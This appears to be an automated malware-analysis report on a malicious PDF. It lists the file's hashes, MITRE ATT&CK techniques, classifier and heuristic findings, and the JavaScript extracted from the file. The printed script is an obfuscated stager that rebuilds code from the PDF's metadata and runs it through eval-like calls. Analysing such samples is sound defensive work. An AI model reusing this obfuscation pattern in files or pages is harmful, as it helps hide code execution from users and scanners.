PDF malware analysis — malicious · 7b9c36c6a0e39e69

MALICIOUS

PDF

18.0 KB Created: 2011-72-51 03:25:00 Authoring application: String.fromCharCode

MD5: 2050df1fa464714e7fafc37dc09aef0e SHA-1: 85bd34c21f8c65c8398d7f0401967d0d9a872f99 SHA-256: 7b9c36c6a0e39e6908cf981e61e036f502b1bdef76690a82041a9f5ba57b0954

114 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript that utilizes String.fromCharCode and other obfuscation techniques to construct and execute code. The script appears to download and execute a payload, as indicated by the ML classifier and heuristics flagging it as a malicious PDF exploit. The use of JavaScript within a PDF points to T1059.007, and the overall execution of code suggests T1203. Given the nature of malicious PDFs, T1566.001 is a likely initial access vector.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0001_000.js
5378e1e5434ef023713458de61a1ab0a5700763a3c3682c8463410974fb9d980 pdf-javascript-stream PDF /JS object 1 at offset 0x45D1 339 bytes

Filename	Kind	Source	Size
`javascript_obj0001_000.js` `5378e1e5434ef023713458de61a1ab0a5700763a3c3682c8463410974fb9d980`	pdf-javascript-stream	PDF /JS object 1 at offset 0x45D1	339 bytes
Preview script First 1,000 lines of the extracted script var w = 4; var xwrc = this.title.replace(/w/g,'*w,'); xwrc = xwrc.replace(/t/g,'2'); xwrc=xwrc.substr(0,xwrc.length-2) + ']'; auub=function(){return this}(); atoro=auub[this.subject]; goa=atoro(this.producer); cfg = atoro(xwrc); var s = ''; for (i = 0; i < cfg.length; i++) { zghmo = cfg[i]; s += goa(zghmo); } atoro(s);

Preview script

First 1,000 lines of the extracted script

var w = 4;
var xwrc = this.title.replace(/w/g,'*w,');
xwrc = xwrc.replace(/t/g,'2');
xwrc=xwrc.substr(0,xwrc.length-2) + ']';
auub=function(){return this}();
atoro=auub[this.subject];
goa=atoro(this.producer);
cfg = atoro(xwrc);
var s = '';
for (i = 0; i < cfg.length; i++) {
	zghmo = cfg[i];
	s += goa(zghmo);
}
atoro(s);

Open this report in the interactive analyzer, or submit your own file for analysis.